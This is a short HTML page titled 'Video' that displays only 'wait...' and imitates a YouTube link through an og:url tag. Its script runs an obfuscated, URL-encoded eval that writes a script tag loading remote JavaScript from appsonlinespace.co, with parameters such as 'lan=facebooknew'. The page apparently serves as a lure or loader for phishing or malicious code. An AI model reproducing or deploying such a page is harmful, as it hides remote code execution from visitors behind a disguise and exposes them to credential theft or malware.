<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge" />
    <title>Video</title>
  </head>
  <body>
    <h1>wait...</h1>
    <meta property="og:url" content="https://youtube.com/" />
    <script type="text/javascript">
<!-- 
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%73%63%72%69%70%74%5c%6e%20%20%20%20%20%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%61%70%70%73%6f%6e%6c%69%6e%65%73%70%61%63%65%2e%63%6f%2f%3f%61%70%69%3d%31%26%6c%61%6e%3d%66%61%63%65%62%6f%6f%6b%6e%65%77%26%68%74%3d%31%26%63%6f%75%6e%74%65%72%30%3d%6a%61%70%6f%6e%31%32%33%22%5c%6e%20%20%20%20%20%20%74%79%70%65%3d%22%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%22%5c%6e%20%20%20%20%20%20%61%73%79%6e%63%3d%22%74%72%75%65%22%5c%6e%20%20%20%20%3e%3c%2f%73%63%72%69%70%74%3e%27%29%3b'));
// -->
</script>
<noscript><i>Javascript required</i></noscript>
  </body>
</html>